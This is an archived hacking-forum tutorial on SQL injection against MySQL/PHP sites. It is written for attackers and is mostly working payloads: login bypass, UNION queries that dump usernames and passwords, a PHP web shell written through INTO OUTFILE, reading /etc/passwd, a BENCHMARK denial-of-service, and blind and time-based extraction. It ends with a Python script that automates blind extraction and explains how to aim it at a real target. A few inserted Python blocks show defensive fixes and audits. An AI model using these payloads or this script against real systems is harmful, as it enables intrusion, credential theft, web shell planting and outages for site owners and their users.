
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community


7 Jul 2007 #1

Dr.Z3r0
Leaders of the World

SQL injection full FAQ

Author: Dr.Z3r0
The article has been moved to rdot.org.
Please note that this is the old version of the article and it will no longer be
updated.

0. INTRO

0.1 Introduction
Browsing the Internet in search of at least some information on SQL injection, you
probably often came across articles that were either very short, or unclear, or covered
only one topic, or had some other problem that did not suit you. Once upon a time I too
collected 10-20 articles on the subject in order to get into the many subtleties of this
vulnerability. Remembering those times, I decided to write a complete FAQ on the topic
so that, so to speak, others would not have to suffer. If you find that I missed something,
made a mistake somewhere, etc., please write below; it is difficult, after all, to keep
everything in my head. By the way, this is my first article, so please don't throw
tomatoes or kick me.

To digest this article you need:

a) A brain
b) Straight hands
c) Knowledge of the SQL language

This article was written mainly for MySQL + PHP.

In general, in my opinion, the best way to learn how to work properly with SQL
injection is not to read this article but to practise, for example by writing a vulnerable
script yourself or using the one I give at the very end.

By the way, I advise you to read everything in order, since each item contains something
important for the next one, and so on.

One more thing. When reading, please note that this article is from 2007 and is a bit
outdated. Now (April 2010) I am trying to rewrite it to make it relevant again.

0.2 General Description

First we need to imagine what a database and scripts are, why we need them, and so on.

Take, for example, the engine of this forum. From the user's side it all looks pretty.
Given the subject of this article, you should ask: where does the engine get its
information (even this very article, these letters)? Right! From the database!

Roughly speaking, the usual database, as we understand it, consists of a set of tables.
Each table, of course, has columns and rows. This is actually the key point. Take, for
example, the table of users of this forum. For each user several parameters have to be
described (nickname, e-mail, registration date, etc.). As a result, each column defines
some parameter of the users, and each row defines a specific user. At the intersection
of the column and row we need there will be the information about the parameter of the
desired user.
(In general this is an oversimplified description of relational databases; you can look up
the details.)

I hope the picture is clear. Now let's talk about interacting with databases. To work with
a database, a special query language, SQL, was developed (by the way, I would advise
you to look for a manual on it, it will come in handy).

Let's start with an example.

Imagine that you (the script) went to the shop (the DB) and asked (the SQL query) the
seller: "Give me one bottle of vodka for 200 rubles."

Let's try to present the request in the form of SQL:

Code:

SELECT product FROM store WHERE (type = 'vodka' AND price = '200') LIMIT 1

In response to your request (SQL query) you (the script) receive a bottle (information),
and the seller (the database) no longer cares what you do with it, since it has done its
job. You can drink it, pour it out, give it away (process it, output it, calculate with it) and
so on.

0.3 So what is SQL injection, after all?

Generally speaking, an SQL injection attack occurs when an attacker can somehow
modify the query sent to the database.

It is easier to explain with examples, so let's go back to the shop.

Let's say you quit drinking. So you decided to go to the shop for kefir, and wrote on a
piece of paper "one packet of kefir for 30 rubles" so as not to forget why you came to
the shop. But you have an alcoholic friend (a hacker, i.e. the attacker) who corrected the
note on the piece of paper (carried out an SQL injection attack) to read "one packet of
kefir for 30 rubles or one bottle of vodka for 200 rubles".

As a result, you come to the shop and, reading from the piece of paper (the incoming
parameter), say: "Give me one packet of kefir for 30 rubles or one bottle of vodka for
200 rubles."

Code:

SELECT product FROM store WHERE (type = 'kefir' AND price = '30') OR (type = 'vodka' AND price = '200') LIMIT 1

The seller, deciding that walking to the fridge with the kefir is further than to the shelf
with the vodka, gives you a bottle. And you go home with a clear conscience, where your
alcoholic friend is already waiting for you, pleased with the result))

That is an actual example of SQL injection. Here the incoming parameters were not
filtered: you did not notice that the second part of the note was written in a different
handwriting, did you?

Of course, this is all exaggerated, but I hope you have caught the idea of SQL queries and
of injections into those queries.
Last edited: Sep 6, 2011


7 Jul 2007 #2

Dr.Z3r0
Leaders of the World

1. HOW TO FIND SQL INJECTION

As you understood above, SQL injection can occur wherever there are incoming
parameters, be it the number of the news item / article you want to see on the site, or a
poll, in general any parameter received from the user. And it occurs when that parameter
is not filtered properly.

Once you understand this, you will see that finding SQL injection is very easy. You need
to insert single and double quotes into all fields, variables and cookies.

1.1 The first case (string incoming parameter)

Let's start with this script: http://xxx/news.php?id=1. Suppose the original query to
the database looks like this:

Code:

SELECT * FROM news WHERE id = '1'

Now we add a quotation mark to the "id" variable, like this: http://xxx/news.php?id=1'
And, if the variable is not filtered, our query to the database will look like this:

Code:

SELECT * FROM news WHERE id = '1''

Here we see a violation of the syntax and logic of the SQL query and, as a result, the
database will not be able to process such a query correctly.

If error messages are enabled, something like this will come out:

mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

If error reporting is off, you can detect the vulnerability like this (it does no harm to do
this as well, so as not to confuse it with case 1.2, as described there):
http://xxx/news.php?id=1'-- , so that the query to the database becomes:

Code:

SELECT * FROM news WHERE id = '1'-- '

(For those who are slow on the uptake, "--" marks the beginning of a comment, and
everything after it is discarded. I also want to draw your attention to the fact that there
must be a space after it (this is written in the MySQL documentation).)
Thus the query to MySQL remains the same and the page displays the same as for
http://xxx/news.php?id=1. The whole of section 2 is devoted to what to do with this
vulnerability.

1.2 The second case (numeric input parameter)

Let's return to the news script. From the SQL language we should remember that
numeric parameters may (the key word is "may", since nothing prevents the programmer
from using the parameter with quotes) be left without quotes, that is, with a call to the
script like http://xxx/news.php?id=1 the query to the database may (!) look like this:

Code:

SELECT * FROM news WHERE id = 1

You can also detect this injection by inserting a quote into the 'id' parameter, after which
we will see the error message:
mysql_query(): ... '1''

If there is no such message, then there are three options:

1. The quote is filtered
2. Error reporting is off
3. There is no injection

To determine whether the quote is filtered, you can enter http://xxx/news.php?id=1 blablabla.
The DB will not understand this "blablabla" and will give an error message like:
mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 blablabla'

If error reporting is off, check like this: http://xxx/news.php?id=1 -- 
You should see exactly the same as for http://xxx/news.php?id=1

1.3 The third case (authorization)

What if the quote is not checked in an authorization script? IMHO it would be plain
stupid to use such an injection merely to display some information. Let the query to the
database be of the form:

Code:

SELECT * FROM users WHERE login = 'Admin' AND pass = '123'

Unfortunately, the password '123' does not fit, but we have found an injection in the
'login' parameter, and in order to log in under the nickname 'Admin' we need to enter
something like Admin' -- instead, that is, the part with the password check is discarded
and we log in under the name 'Admin'.

Code:

SELECT * FROM users WHERE login = 'Admin' -- ' AND pass = '123'

And now what if the vulnerability is in the 'pass' field? We enter the following in that
field: 123' OR login = 'Admin' -- . The query will be as follows:

Code:

SELECT * FROM users WHERE login = 'Admin' AND pass = '123' OR login = 'Admin' -- '

which for the DB is completely equivalent to this query:

Code:

SELECT * FROM users WHERE (login = 'Admin' AND pass = '123') OR (login = 'Admin')

And after these actions we become the full owner of the account with the login 'Admin'.

1.4 The fourth case (the LIKE operator)

In SQL there is a LIKE operator. It is used to compare strings. Suppose the authorization
script, when a username and password are entered, requests information from the
database like this:

Code:

SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123'

Even if this script filters the quote, it still remains vulnerable to injection. Instead of the
password we only need to enter "%" (for the LIKE operator the "%" character matches
any string), and then the query becomes

Code:

SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%'

and lets us in with the login 'Admin'. In this case we have not only found an SQL
injection but also successfully used it.

Now you can go to paragraph 2.
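The four cases above share one root cause: the request parameter is pasted into the SQL text. The Python below is an added example (not from the article) that reproduces cases 1.1, 1.3 and 1.4 against a constructed in-memory SQLite table and puts the fix beside each: bound parameters stop the quote and comment tricks, and for LIKE the wildcards themselves must be escaped, since, as the author notes, filtering quotes alone does not help. Table and row contents are assumptions.

```python
import sqlite3

# Constructed stand-in for the forum's users/news tables (assumed contents).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("Admin", "s3cret"), ("guest", "guest")])
    db.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "First news"), (2, "Second news")])
    return db

# --- the vulnerable pattern from the article: input pasted into the SQL text ---
def news_concat(db, news_id):
    sql = f"SELECT title FROM news WHERE id = '{news_id}'"
    return [r[0] for r in db.execute(sql)]   # a stray quote raises here, like mysql_query()

def login_concat(db, login, pw):
    sql = f"SELECT login FROM users WHERE login = '{login}' AND pass = '{pw}'"
    return [r[0] for r in db.execute(sql)]

def quote_breaks_query(db, news_id):
    """Case 1.1 probe, run against your own script: does a lone quote break the query?"""
    try:
        news_concat(db, news_id + "'")
        return False
    except sqlite3.OperationalError:
        return True

# --- the fix: the value travels as a bound parameter, never as SQL text ---
def news_param(db, news_id):
    return [r[0] for r in db.execute("SELECT title FROM news WHERE id = ?", (news_id,))]

def login_param(db, login, pw):
    return [r[0] for r in db.execute(
        "SELECT login FROM users WHERE login = ? AND pass = ?", (login, pw))]

# --- case 1.4: LIKE is still bypassable with '%' even when bound, so escape wildcards ---
def login_like_param(db, login, pw):
    return [r[0] for r in db.execute(
        "SELECT login FROM users WHERE login LIKE ? AND pass LIKE ?", (login, pw))]

def escape_like(s):
    # backslash first, then the two LIKE metacharacters
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def login_like_escaped(db, login, pw):
    return [r[0] for r in db.execute(
        "SELECT login FROM users WHERE login LIKE ? ESCAPE '\\' AND pass LIKE ? ESCAPE '\\'",
        (escape_like(login), escape_like(pw)))]
```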

2. WHAT USEFUL THINGS CAN BE EXTRACTED FROM THIS, AND WHERE

From here on only the vulnerability type described in section 1.1 will be considered; you
can adapt the rest yourself, it is not difficult.

2.1 The UNION command

The most useful thing in our case is the UNION command (whoever does not know it,
google it)...

In a nutshell, it merges two queries into one. This is very useful, since you can specify
almost your whole query to the database, for example to display information from any
table.

Modify the call to the script: http://xxx/news.php?id=1' UNION SELECT 1 -- . We get a
query to the database like this:

Code:

SELECT * FROM news WHERE id = '1' UNION SELECT 1 -- '

2.1.1.1 Selecting the number of fields (Method 1 - the UNION operator)

The thing is that the number of columns before and after UNION must match, and an
error will most likely come out (unless the news table has one column):
The used SELECT statements have a different number of columns

In this case we need to select the number of columns (so that their number before and
after the UNION matches). We do it like this:

http://xxx/news.php?id=1' UNION SELECT 1,2 -- 

Error: "The used SELECT statements have a different number of columns"

http://xxx/news.php?id=1' UNION SELECT 1,2,3 -- 

Error again.

...

http://xxx/news.php?id=1' UNION SELECT 1,2,3,4,5,6 -- 

Oh! It was displayed exactly the same way as http://xxx/news.php?id=1, which means
the number of fields has been found, that is, there are 6 of them...

2.1.1.2 Selecting the number of fields (Method 2 - the GROUP BY operator)

This method is based on selecting the number of fields using GROUP BY. That is, a
request of this type:
http://xxx/news.php?id=1' GROUP BY 2 -- 

It will be displayed without errors if the number of fields is less than or equal to 2.
We make a request of this type:
http://xxx/news.php?id=1' GROUP BY 10 -- 

Oops... There was an error of this type:

mysql_query(): Unknown column '10' in 'group statement'

So there are fewer than 10 columns. We divide 10 by 2 and make the query
http://xxx/news.php?id=1' GROUP BY 5 -- 

Oops! There is no error, which means the number of columns is greater than or equal to
5 but less than 10. Now we take the average of 5 and 10, which gives about 7. Do the
query:
http://xxx/news.php?id=1' GROUP BY 7 -- 

Oh, an error again...

mysql_query(): Unknown column '7' in 'group statement'

This means greater than or equal to 5 but less than 7. Make another request:
http://xxx/news.php?id=1' GROUP BY 6 -- 

No errors... greater than or equal to 6 but less than 7. It follows that the required
number of columns is 6.

2.1.1.3 Selecting the number of fields (Method 3 - ORDER BY)

The same principle as in 2.1.1.2, only using ORDER BY. The error text changes slightly if
there are more fields:
mysql_query(): Unknown column '10' in 'order clause'

2.1.2 Determining the displayed columns

I think a page like http://xxx/news.php?id=1 does not suit many of us. So we need to
make sure that nothing is output by the first query (before the UNION). Roughly
speaking, you need to cut off the output of the first query.

The easiest way is to change the "id" from '1' to '-1' (or to '9999999'):
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 -- 

Or add a false condition:

http://xxx/news.php?id=1' AND 1=0 UNION SELECT 1,2,3,4,5,6 -- 

Now some of these numbers should be displayed somewhere on the page. (For example,
since this is conditionally a news script, in the "News title" let's say 3 will be displayed,
in "News" 4, and so on.) Now, in order to get some information, we need to replace
these numbers in the request to the script with the functions we need. If the digits are
not displayed anywhere, then most likely there is no output and the remaining
subsections of 2.1 can be skipped.

2.1.3 SIXSS (SQL Injection Cross Site Scripting)

This is the same XSS, only carried out through a request to the database. Example:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<script>alert('SIXSS')</script>',5,6 -- 
I think it is not hard to understand that 4 on the page will be replaced by
<script>alert('SIXSS')</script> and accordingly the very same XSS results.

2.1.4 Column / table names

If you know the names of the tables and columns in the database, you can skip this item.
If you don't... there are two ways.

2.1.4.1 Column / table names if you have access to INFORMATION_SCHEMA and the
MySQL version is >= 5

The INFORMATION_SCHEMA.TABLES table contains information about all tables in the
database; the TABLE_NAME column holds the names of the tables.
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME,5,6 FROM INFORMATION_SCHEMA.TABLES -- 
This is where a problem may appear, since only the first row of the database response
is displayed. Then we need to use LIMIT, like this:

Output the first row:

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 -- 

Output the second row:

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 -- 
etc.

Well, we found the Users table. Only... ahem... we don't know the columns... Then the
INFORMATION_SCHEMA.COLUMNS table comes to the rescue. The COLUMN_NAME column
contains the name of a column in the table TABLE_NAME. This is how we retrieve the
column names:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users' LIMIT 0,1 -- 
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users' LIMIT 1,1 -- 
etc.

And here we found the login and password fields.

2.1.4.2 Column / table names if there is no access to INFORMATION_SCHEMA

Unfortunately, here plain brute force comes into play... Example:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 FROM Table_name -- 

It is necessary to try table names until an error like this disappears:

mysql_query(): Table 'table_name' doesn't exist

Well, luckily we entered Users, the error message disappeared, and the page looks as if
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 -- had been requested. What
does this mean? It means there is a Users table, and you need to start going through
the columns.
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,Column_Name,5,6 FROM Users -- 

It is necessary to try column names until the error message of this type disappears:
mysql_query(): Unknown column 'Column_Name' in 'field list'

When the error message disappears, it means such a column exists.

And this is how we learned that the Users table has login and password columns.

2.1.5 Outputting information

Accessing the script like this:
http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 0,1 -- 
displays the login and password of the first user from the Users table.

2.2 Working with files

The MySQL server supports working with files. Yes, it is somewhat limited, but then it
is not a file manager. To work with files the current user must have the right to do so,
that is, FILE_PRIV.

2.2.1 Writing to a file

MySQL has an interesting construction of the form SELECT ... INTO OUTFILE that allows
you to write information to a file. There is also the almost identical construction
SELECT ... INTO DUMPFILE; you can use either.

Example: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' -- 

There are several limitations for it:

It is forbidden to overwrite files
Requires the FILE privilege
(!) The file name must be given in real quotes

But what would stop us from making a web shell? For example:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET['e']) ?>',5,6 INTO OUTFILE '1.php' -- 

It remains only to find the full path to the root of the site on the server and prepend it
to 1.php. In principle, you can find the path on the server from some other error report,
or leave the file in the server's root and pick it up via a local connection, but that is
another topic.

2.2.2 Reading files

Consider the LOAD_FILE function.

Example: http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('/etc/passwd'),4,5,6 -- 

There are also several restrictions for it:

The full path to the file must be specified.
Requires the FILE privilege
The file must be on the same server.
The size of the file must be less than the value specified in max_allowed_packet
The file must be readable by the user under which MySQL is running.

If the function fails to read the file, it returns NULL.
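From the defender's side, the two prerequisites this section keeps naming (the FILE privilege and a reachable path) are what to audit on the application's database account. The Python below is an added example, not the article's code: it parses rows in the shape MySQL's SHOW GRANTS returns and, together with the value of the secure_file_priv server variable (not mentioned in the article; empty means unrestricted, NULL means file import/export disabled, otherwise a directory), reports whether INTO OUTFILE / LOAD_FILE could work for that account. The grant rows and the 'web'@'localhost' account are constructed sample data.

```python
import re

# Constructed sample rows as returned by SHOW GRANTS FOR 'web'@'localhost'
# (assumed account; not taken from the article).
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'web'@'localhost'",
    "GRANT FILE ON *.* TO 'web'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE ON `forum`.* TO 'web'@'localhost'",
]

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s",
                      re.IGNORECASE)

def parse_grants(rows):
    """Turn SHOW GRANTS rows into (PRIVILEGE, scope) pairs, one per privilege."""
    pairs = []
    for row in rows:
        m = GRANT_RE.match(row.strip())
        if not m:
            continue  # skip rows that do not follow the GRANT ... ON ... TO shape
        for priv in m.group("privs").split(","):
            pairs.append((priv.strip().upper(), m.group("scope")))
    return pairs

def has_file_privilege(rows):
    """FILE is a global privilege: only FILE or ALL PRIVILEGES granted ON *.* confer it;
    ALL PRIVILEGES on a single database does not."""
    return any(scope == "*.*" and priv in ("FILE", "ALL PRIVILEGES")
               for priv, scope in parse_grants(rows))

def file_access_findings(rows, secure_file_priv):
    """Findings for the section 2.2 techniques. secure_file_priv is the server
    variable's value: '' = unrestricted, None = NULL (disabled), else a directory."""
    findings = []
    if has_file_privilege(rows):
        findings.append("account holds FILE globally: revoke it, the web app needs no file I/O")
    if secure_file_priv == "":
        findings.append("secure_file_priv is empty: OUTFILE/LOAD_FILE may touch any path mysqld can")
    elif secure_file_priv is not None:
        findings.append(f"secure_file_priv confines file operations to {secure_file_priv}")
    return findings
```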

2.3 DoS attack on the SQL server

In most cases this is resorted to because nothing else can be done: the tables / columns
could not be discovered, there are no rights for this or that, etc. I am honestly against
this method, but still...

Let's get to the point...

The BENCHMARK function performs the same action several times.

Code:

SELECT BENCHMARK(100000, md5(current_time))

That is, this function computes md5(current_time) 100,000 times, which takes about 0.7
seconds on my computer... So it seemed... And what if you try nested BENCHMARK?

Code:

SELECT BENCHMARK(100000, BENCHMARK(100000, md5(current_time)))

It takes a very long time; to be honest, I did not even wait for it... I had to do a reset.

An example of DoS in our case:

http://xxx/news.php?id=-1' UNION SELECT 1,2,BENCHMARK(100000,BENCHMARK(100000,md5(current_time))),4,5,6 -- 

Poke F5 a hundred times and "the server will quickly fall down"))).
Last edited: 27 Apr 2010


7 Jul 2007 #3

Dr.Z3r0
Leaders of the World

3. WHAT TO DO IF THERE IS NO OUTPUT ON THE PAGE.

3.1 Output in the error report

You can find more details in the comments to the article Fast Blind SQL Injection (Qwazar).

The idea of this method is to try to find output in the error report, that is, to
dynamically pass an arbitrary substring into a MySQL error.

In general, I see no point in trying to explain the meaning and logic of the query;
honestly speaking, I barely got to the bottom of it myself)

Code:

SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))

The disadvantage of this method is that it is impossible to output a string longer than
63 characters at a time, and of course error reporting needs to be enabled.

Actually, here is an example of how you can use this method:

http://xxx/news.php?id=-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) -- 

As a result of the previous query we will see an error like:
Duplicate entry '5.0.45-community-nt0' for key 1

Keep in mind that the last zero in the line "5.0.45-community-nt0" does not belong to
the version string; it is the result of executing FLOOR(RAND(0)*2), without which it would
not be possible to provoke the error, and because of which we output 63 characters
instead of the 64 it might initially have seemed.

3.2 Character-by-character search

This case is needed if http://xxx/news.php?id=1 with different id values gives us
different results. For example, http://xxx/news.php?id=1 differs from
http://xxx/news.php?id=0. If not, then this method is useless, but it is still worth
reading to the end.

As we remember, our query to the database looks like this:

Code:

SELECT * FROM news WHERE id = '1'

Now, via the vulnerable id parameter, we modify it into a query like this (if you are not
familiar with it, go to item 5 and read):

Code:

SELECT * FROM news WHERE id = '-1' OR id = IF(ASCII((SELECT USER())) >= 254, '1', '0') -- '

Like this: http://xxx/news.php?id=-1' OR id = IF(ASCII((SELECT USER())) >= 254,'1','0') -- 

What does this give us? To begin with, MySQL executes the SELECT USER() subquery
inside the ASCII() function, which returns the ASCII code of the first character of the
subquery result, and the IF() function returns 1 if this code is greater than or equal to
100.

Code:

SELECT * FROM news WHERE id = '-1' OR id = 1

and this executes in the same way as accessing the script http://xxx/news.php?id=1;
and if the code is less, the main query becomes

Code:

SELECT * FROM news WHERE id = '-1' OR id = 0

and this executes exactly the same way as

http://xxx/news.php?id=0

Let's say, conditionally, that the query returns 1 (yes) or 0 (no) respectively, and begin
to iterate.

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) >= 100,'1','0') -- 
Yeah, it returned 1, which means the first character code is greater than or equal to 100.
Try this:

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) >= 200,'1','0') -- 
It returned 0, which means 100 <= character code < 200.

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) >= 150,'1','0') -- 
0 means 100 <= character code < 150.

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) >= 125,'1','0') -- 
And it returned 0, which means 100 <= character code < 125.

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) >= 113,'1','0') -- 
Returned 1, therefore 113 <= character code < 125.

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) >= 118,'1','0') -- 
Returned 0, therefore 113 <= character code < 118.

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) >= 115,'1','0') -- 

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) = 113,'1','0') -- 
Returned 0, which means the character code is not equal to 113.

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),0,1)) = 114,'1','0') -- 
Hooray! Returned 1, which means the character code is equal to 114. Translate it into a
character and get "r". Now on to the next character.

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),2,1)) >= 100,'1','0') -- 

And repeat all the previous steps again.

3.3 Binary search using BENCHMARK

What to do if there are no displayed fields and error reporting is turned off? The
BENCHMARK function comes to our rescue. As written above, this function performs one
action several times. "So what?" you ask... Here is what. Recall that the query

Code:

SELECT BENCHMARK(100000, BENCHMARK(100000, md5(NOW())))

takes a veeery long time to execute, and based on delays (no, don't be scared, not the
delays you just thought of) we will iterate through some parameter, say the name of the
user under which we are connected to the database (the USER() function shows it).

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1)) >= 100, 1, BENCHMARK(2999999, MD5(NOW()))) -- 
The query will be as follows:

Code:

SELECT * FROM news WHERE id = '-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1)) >= 100, 1, BENCHMARK(2999999, MD5(NOW()))) -- '

And now, by analogy with the previous section, we go through the USER() string. Only
in this case, instead of 0, the function will execute this request for a very long time,
which tells us that the request returned 0, and accordingly, if there is no delay, the
request returned 1.

Now let's talk about the delay time. In order to tell the return of 0 and 1 apart by time,
you must first make several requests:
http://xxx/news.php?id=-1' OR id = IF(99 > 100, 1, BENCHMARK(2999999, MD5(NOW()))) -- 

This will return 0. Note the time. Depending on the width of your channel you need to
tune the number 2999999 to the current situation, so that you can accurately judge
whether there was a delay or not compared to
http://xxx/news.php?id=-1' OR id = IF(101 > 100, 1, BENCHMARK(2999999, MD5(NOW()))) -- 
which will return 1.

A huge disadvantage is that with BENCHMARK we load the server very heavily.

ATTENTION! In this case the main thing is not to forget that after each BENCHMARK
execution the SQL server needs to be given some time to rest (slightly more than the
BENCHMARK execution itself). Otherwise the results of this search may be incorrect.

3.4 Character-by-character search using SLEEP

Well, we have read about BENCHMARK. And everyone noticed the terrible instability of
that method. "So what?" you ask. Here is what. Starting with the MySQL 5 branch, the
SLEEP() function appeared.

In fact, this function creates the delay we need in the web server's response, and, note,
without unnecessary load on it. That is, SLEEP() is the best alternative to BENCHMARK()
and it is preferable to use it, but I repeat, the only drawback is that this function only
appeared in the 5th branch. A fairy tale, and nothing more.

How to use it? Everything is elementary:

http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1)) >= 100, 1, SLEEP(3)) -- 

I use a value of two to three seconds, but I advise you to choose it according to the
server's channel, as errors in the output may occur.

3.5 Character-by-character search using error reporting

This item is written based on the article "New Benchmark Alternative or Effective Blind
SQL-injection" by Elekt, respect to him.

This method is based on the fact that instead of returning 0, a subquery is executed
which causes an error, so it is possible to judge from the error output that 0 was
returned, and from the absence of an error that 1 was returned. This method will help us
if there are no displayed fields but error reporting is turned ON (!).

Code:

SELECT * FROM news WHERE id = '-1' OR id = (SELECT 1 UNION SELECT 2)

What do you think this query returns? Correct, an error, because id is compared with a
subquery that returns two rows.
mysql_query(): Subquery returns more than 1 row

That was the theory. Now on to the query with the help of which we will iterate through
the characters:

Code:

SELECT * FROM news WHERE id = '-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1)) >= 100, 1, (SELECT 1 UNION SELECT 2)) -- '

As can be seen from this query, if the character code is greater than or equal to 100 the
IF() function returns 1 and no error occurs, and otherwise the function executes the
subquery

Code:

SELECT 1 UNION SELECT 2

which returns two rows, which causes an error when compared with id, and we
understand that the request returned 0.

A huge disadvantage of this method is the fact that huge numbers of errors accumulate in
the logs. A huge plus is the speed of work.

3.6 Injection in the ORDER BY operator

For some reason many have formed the opinion that this is a hopeless case. Well, we will change that opinion to the opposite. Suppose the query to the database looks like this:

Code:

SELECT * FROM news ORDER BY $by

and, as always, the $by variable is not filtered, and several rows from the database are displayed on the page. We need two requests that change the output on the page in some visible way, but such that we can still influence the result with valid subqueries. Such requests can be

http://xxx/news.php?by=(id*1)
http://xxx/news.php?by=(id*-1)

I hope you guessed that the second time the rows come out "bottom to top" relative to the first request; why is not hard to understand. Suppose the first time the output was this, and we take it as truth:

Code:

First news
Second news
Third news

and the second time as a lie:

Code:

Third news
Second news
First news

Then the query for brute-forcing the name of the current user looks like this (SUBSTRING positions in MySQL start at 1; with 0 it returns an empty string and ASCII() of that is 0):

http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=112,1,-1))
The news came out in reverse order => false

http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
Again a lie

http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=114,1,-1))
Oh! Direct news order => true. We translate the character code 114 into the character r. Move on to the next character, and so on.
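The brute-force loop that the three requests above sketch, as an added example that is not part of the original article: a Python stand-in for news.php backed by an in-memory SQLite table with MySQL-style ASCII(), SUBSTRING() and USER() registered as SQL functions (constructed test data; USER() is assumed to return root@localhost). The ORDER BY payload is the page's (id*IF(...,1,-1)) written as the portable CASE WHEN ... THEN 1 ELSE -1 END, which MySQL accepts as well, and the extraction goes beyond the single-character equality test above: it binary-searches each character code with >= comparisons, eight requests per character instead of up to 256.

```python
import sqlite3

# Constructed stand-in for the page's news.php: an in-memory SQLite table plus
# MySQL-style ASCII(), SUBSTRING() and USER() registered as SQL functions, so the
# payloads from the text run against it unchanged (all values here are assumed).
MYSQL_USER = "root@localhost"          # what USER() is assumed to return

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER, caption TEXT)")
conn.executemany("INSERT INTO news VALUES (?, ?)",
                 [(1, "First news"), (2, "Second news"), (3, "Third news")])
conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)   # MySQL: ASCII('') = 0
conn.create_function("SUBSTRING", 3,
                     lambda s, pos, n: s[pos - 1:pos - 1 + n] if pos >= 1 else "")
conn.create_function("USER", 0, lambda: MYSQL_USER)

stats = {"requests": 0}                # how many "HTTP requests" an extraction costs


def vulnerable_news(by):
    """The script under attack: $by goes into ORDER BY without any filtering."""
    stats["requests"] += 1
    return [caption for _, caption in
            conn.execute(f"SELECT id, caption FROM news ORDER BY {by}")]


def oracle(condition):
    """True if the MySQL boolean expression `condition` holds on the server.

    (id*1) keeps the natural order and (id*-1) reverses it, so the first row
    on the page reveals which branch the conditional took.  CASE WHEN is the
    portable spelling of the page's IF(cond,1,-1); MySQL accepts both.
    """
    rows = vulnerable_news(f"(id*CASE WHEN {condition} THEN 1 ELSE -1 END)")
    return rows[0] == "First news"


def extract_user(max_len=64):
    """Recover USER() character by character.

    Instead of testing one candidate code per request (=112, =113, ...) as in
    the text, binary-search the code with >= comparisons: 8 requests per
    character whatever the character is.  ASCII() of the position past the
    end of the string is 0, which ends the loop.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255                         # invariant: lo <= code <= hi
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(f"ASCII(SUBSTRING(USER(),{pos},1))>={mid}"):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(vulnerable_news("(id*1)"))
    print(vulnerable_news("(id*-1)"))
    print("USER() =", extract_user(), "in", stats["requests"], "requests")
```

Against a real target the two vulnerable_news() calls become HTTP requests and the "First news" check becomes a check on which caption appears first in the response body; everything else stays as it is.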

